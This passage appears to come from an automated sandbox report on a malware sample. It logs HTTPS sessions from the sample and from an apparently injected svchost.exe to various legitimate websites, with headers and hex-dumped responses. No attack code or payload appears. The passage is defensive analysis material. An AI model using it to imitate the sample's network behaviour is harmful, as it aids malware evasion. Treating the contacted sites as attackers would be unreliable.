                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC857INData Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      49192.168.2.520031188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC809OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.se
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC857INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:32 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://hyab.com
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:55:32 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JaAjO9dVFLsYxD40ZN8Zar6YHRYEtHQaNSed77%2B5M5XgSGcQs5C0nz7RWje8UHZegOvTcdq%2F1qy%2Fv5m4eT7M2lYl1qQjMMPK1%2BOGKkb9Ua%2FvknFhXWroVfOk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc9269e67903a-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC858INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC858INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      5192.168.2.55023275.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:28 UTC62OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: ldh.la.gov
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:28 UTC62INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:44:28 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 1346
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:28 UTC63INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      50192.168.2.520088172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC857OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: orlyhotel.com
                                                                                                                                                                                                                                                                                                      Cookie: django_language=en
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC925INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:32 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:35:25 GMT
                                                                                                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 22 Mar 2023 04:35:25 GMT
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Vary: Accept-Language
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wFJDlqI1h4swEUhEDGR8Sb1vy1iAAwQ2QtBYQHvSaVPrRbHk802LYkRBIvHf4AibFpTTyP4wU%2FIEsM7c8dlg5icSb4iJIPkypxedcxtIvttwmcX%2BZrNOu44%2BLsg6Ftw4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc927b8ad9171-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC926INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC926INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      51192.168.2.520115104.21.65.224443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC858OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.com
                                                                                                                                                                                                                                                                                                      Cookie: PHPSESSID=8dd73ce1a917b5d53ecdcb71ebb9bc82
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC971INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                      Location: https://hyabmagneter.se
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wFkYiq%2FTzoe1c9fnU3If2iSMOJPj3W8KteqV8tcYf2CivD1aR49QpCqxWtx2T4mQ7FjIeJBzwzy9EuNEnOzCkJawjjwvC6PLfBbY6egkdF2Yev%2B9f7PtNAZvAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc9283b199150-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC971INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      52192.168.2.52009235.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC858OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: flamingorecordings.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:32 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      SG-F-Cache: HIT
                                                                                                                                                                                                                                                                                                      X-Httpd-Modphp: 1
                                                                                                                                                                                                                                                                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                                                      X-Proxy-Cache: HIT
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC859INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC875INData Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69
                                                                                                                                                                                                                                                                                                      Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC891INData Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d
                                                                                                                                                                                                                                                                                                      Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC907INData Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69
                                                                                                                                                                                                                                                                                                      Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC923INData Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      53192.168.2.520163185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC925OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC926INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:32 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:32 UTC926INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      54192.168.2.520238188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC927OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: sigtoa.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:33 UTC971INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:33 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0GEb0hHB19jxZFY6dIMek5HP1wG4EZpsMFgbVQeV9FOMckjHz6F6uIh85%2BqiGGI22kPMt64G0yGzINSOYCFPZAdf8gHAH1uQjsZk64zGAfZIx9jcuoiqd%2BY5URuV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc929ce82918c-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
